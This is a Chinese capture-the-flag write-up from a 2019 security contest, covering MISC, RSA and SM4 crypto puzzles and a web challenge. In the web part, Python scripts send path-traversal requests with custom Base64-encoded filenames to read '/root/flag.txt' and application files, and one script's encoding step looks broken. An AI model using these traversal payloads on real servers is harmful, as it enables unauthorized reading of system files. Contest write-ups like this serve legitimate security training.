网络与信息安全专项赛复盘

比赛时间：8月15日9:30-8月15日19:00
比赛网站：https://race.ichunqiu.com/nisc2019

MISC

签到题

• 题目描述

  
  
• 解题步骤
  dig 命令主要用来从 DNS 域名服务器查询主机地址信息。
  dig txt gamectf.com
gamectf.com. 600 IN TXT "flag{welcome_TXT}"

七代目

• 题目描述

• 解题步骤

1. 修复文件头GIF8

2. 查看每一帧的时间：

3. 序号为6的帧只有1，保存下来切换一下通道：

亚萨西

• 题目描述

• 解题步骤

1. 下载winrar打开提示是损坏的zip⽂件

使用7zip或者bandlize打开压缩包提示需要输入密码

2. winhex打开，发现可疑密码字符

得到密码是loli，解压得到图片

3. winhex打开发现有0ok！编码，在线解码得到flag

24word

• 题目描述

• 解题步骤

1. 解压得到图片，进行社会主义核心价值观解码得到：CodeValues

2. binwalk看下图片发现压缩包，修改后缀为zip，密码CodeValues解码得到图片

3. 扫描二维码得到flag

Crypto

dp

• 题目描述

• 解题步骤

import gmpy2
import libnum
e = 65537
n = 9637571466652899741848142654451413405801976834328667418509217149503238513830870985353918314633160277580591819016181785300521866901536670666234046521697590230079161867282389124998093526637796571100147052430445089605759722456767679930869250538932528092292071024877213105462554819256136145385237821098127348787416199401770954567019811050508888349297579329222552491826770225583983899834347983888473219771888063393354348613119521862989609112706536794212028369088219375364362615622092005578099889045473175051574207130932430162265994221914833343534531743589037146933738549770365029230545884239551015472122598634133661853901
dp = 81339405704902517676022188908547543689627829453799865550091494842725439570571310071337729038516525539158092247771184675844795891671744082925462138427070614848951224652874430072917346702280925974595608822751382808802457160317381440319175601623719969138918927272712366710634393379149593082774688540571485214097
c = 5971372776574706905158546698157178098706187597204981662036310534369575915776950962893790809274833462545672702278129839887482283641996814437707885716134279091994238891294614019371247451378504745748882207694219990495603397913371579808848136183106703158532870472345648247817132700604598385677497138485776569096958910782582696229046024695529762572289705021673895852985396416704278321332667281973074372362761992335826576550161390158761314769544548809326036026461123102509831887999493584436939086255411387879202594399181211724444617225689922628790388129032022982596393215038044861544602046137258904612792518629229736324827

def n2s(n):
    """
    Number to string.
    """
    s = hex(n)[2:]
    if len(s) % 2 != 0:
        s = "0" + s
    return str(s.decode('hex'))

for i in range(1,65538):
    if (dp*e-1)%i == 0:
        if n%(((dp*e-1)/i)+1)==0:
            p=((dp*e-1)/i)+1
            q=n/(((dp*e-1)/i)+1)
            phi = (p-1)*(q-1)
            d = gmpy2.invert(e,phi)%phi
            print n2s(pow(c,d,n))

参考资料
https://zhuanlan.zhihu.com/p/43033684

• 解题步骤

sm4

• 题目描述

• 解题步骤
  ECB模式 sm4解密库: https://github.com/yang3yen/pysm4

# -*- coding: utf-8 -*-
from pysm4 import encrypt, decrypt
import binascii

def dec_hex(str1):
    a = str(hex(str1))
    b = a.replace("0x", '')
    return b.zfill(2)

def hex_str(dic):
    hexstr = "0x"
    for i in dic:
        hexstr = hexstr + dec_hex(i)
    return hexstr


if __name__ == '__main__':
    key = [13, 204, 99, 177, 254, 41, 198, 163, 201, 226, 56, 214, 192, 194, 98, 104]
    c1 = [46, 48, 220, 156, 184, 218, 57, 13, 246, 91, 1, 63, 60, 67, 105, 64]
    c2 = [149, 240, 217, 77, 107, 49, 222, 61, 155, 225, 231, 196, 167, 121, 9, 16]
    c3 = [60, 182, 65, 101, 39, 253, 250, 224, 9, 204, 154, 122, 206, 43, 97, 59]
    keyStr = hex_str(key)
    c1_str = hex_str(c1)
    c2_str = hex_str(c2)
    c3_str = hex_str(c3)
    # print hex(decrypt(0x2e30dc9cb8da390df65b013f3c436940,0x0dcc63b1fe29c6a3c9e238d6c0c26268))[2:-1]
    # print hex(decrypt(0x95f0d94d6b31de3d9be1e7c4a7790910, 0x0dcc63b1fe29c6a3c9e238d6c0c26268))[2:-1]
    # print hex(decrypt(0x3cb6416527fdfae009cc9a7ace2b613b, 0x0dcc63b1fe29c6a3c9e238d6c0c26268))[2:-1]
    c_str = hex(decrypt(0x2e30dc9cb8da390df65b013f3c436940,0x0dcc63b1fe29c6a3c9e238d6c0c26268))[2:-1] + hex(decrypt(0x95f0d94d6b31de3d9be1e7c4a7790910, 0x0dcc63b1fe29c6a3c9e238d6c0c26268))[2:-1] + hex(decrypt(0x3cb6416527fdfae009cc9a7ace2b613b, 0x0dcc63b1fe29c6a3c9e238d6c0c26268))[2:-1]
    print c_str
    print binascii.a2b_hex(c_str)

## SM4:  flag{1caa96be-4266-4a8e-bd2c-ece977495497}

WEB

from urllib.parse import unquote,quote

import requests
import base64
import re
import string
import random

s = requests.sessions()
url = "http://127.0.0.1:8999"
new_dict = {}

def get_b_name():
    test_name = ''.join(random.sample(string.ascii_letters + string.digits,50))
    #  join() 方法用于将序列中的元素以指定的字符连接生成一个新的字符串
    #  random.sample(seq, n) 从序列seq中选择n个随机且独立的元素
    #  string模块ascii_letters和digits方法，其中ascii_letters是生成所有字母，从a-z和A-Z,digits是生成所有数字0-9
    #  最后生成的字符串是从"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"随机截取50个元素
    o_file_name = test_name + '.jpg'
    origin = base64.b64encode(str.encode(o_file_name))
    origin = bytes.decode(origin)
    # bytes.decode() 方法以指定的编码格式解码 bytes 对象。默认编码为 'utf-8'
    upload_url = url + "/upload.php"
    with open('test.jpg','rb') as file:
        files = {'file':(o_file_name,file)}
        requese = requests.post(upload_url,files=files)
        text = requese.text
        file_name = re.search(r'"img.php\?name=(.+?)"',text).group(1)
        file_name = unquote(file_name)
    return origin,file_name

def make_dict(origin,file_name):
    num = 0
    for i in origin:
        # print(i,file_name[num])
        new_dict[i] = file_name[num]
        num += 1

if __name__ == '__main__':
    length = len(new_dict)
    for i in  range(15):
        origin, file_name = get_b_name()
        make_dict(origin, file_name)
        length = len(new_dict)
    res = []
    flag = bytes.decode(base64.b64decode(b'../../../../../root/flag.txt'))
    for f in flag:
        if f == '=':
            res.append('=')
        else:
            res.append(new_dict[f])
        payload = ''.join(res)
        print(quote(payload))

import string
import requests as req
import base64
import urllib
·
z = {'0': 'Y', '2': 'P', '4': 'y', '6': 'e', '8': 'v', 'B': 'z', 'D': 'N', 'F': 't', 'H': 'x', 'J': 'U', 'L': 'X', 'N': 'F', 'P': 'V', 'R': 'q', 'T': 'a', 'V': 'l', 'X': 'm', 'Z': 'S', 'b': '4', 'd': 'B', 'f': 'h', 'h': '5', 'j': 'c', 'l': 'M', 'n': '9', 'p': 'w', 'r': '1', 't': '8', 'v': 'o', 'x': 'i', 'z': 'K',
     '+': 'u', '/': 'A', '1': '0', '3': 'C', '5': 'T', '7': 'I', '9': 'k', 'A': 'b', 'C': 'J', 'G': '7', 'I': 'f', 'K': '6', 'M': 'Z', 'O': '2', 'Q': '+', 'S': 'd', 'U': '3', 'W': 'R', 'Y': 'W', 'a': 'L', 'c': 'r', 'e': 'g', 'g': 'n', 'i': 'E', 'k': 'j', 'm': 'G', 'o': 'H', 'q': 'Q', 's': 'p', 'u': 's', 'w': 'O', 'y': 'D', 'E': '\\'}

b64table = string.maketrans(
    ''.join(z.keys()), ''.join([z[k] for k in z.keys()]))


b64table2 = string.maketrans(
    ''.join([z[k] for k in z.keys()]), ''.join(z.keys()))
URL = 'http://3fc6a707471d4c83959773ac33db4ec348f07f0fa23e4e15.changame.ichunqiu.com/img.php?name={}'

def get(pl):
    pl = base64.b64encode(pl)
    print "[+] Normal Base64 :", pl
    pl = pl.translate(b64table2)
    # translate() 方法根据参数table给出的表(包含 256 个字符)转换字符串的字符, 要过滤掉的字符放到 del 参数中
    print "[+] Encode Base64 :", pl
    pl = urllib.quote(pl)
    res = req.get(URL.format(pl))
    print(res.content)

def test(pl):
    pl = pl.translate(b64table)
    pl = base64.b64decode(pl)
    print pl

if __name__ == '__main__':
    get("../../../../../../proc/self/cwd/templates/upload.html")
    get("../../../../../../root/flag.txt")

参考资料：爆破非默认Base64编码表

爆破Base64总结：把\x00\x10\x83\x10\x51\x87\x20\x92\x8B\x30\xD3\x8F\x41\x14\x93\x51\x55\x97\x61\x96\x9B\x71\xD7\x9F\x82\x18\xA3\x92\x59\xA7\xA2\x9A\xAB\xB2\xDB\xAF\xC3\x1C\xB3\xD3\x5D\xB7\xE3\x9E\xBB\xF3\xDF\xBF这个作为输入，输出就是base64table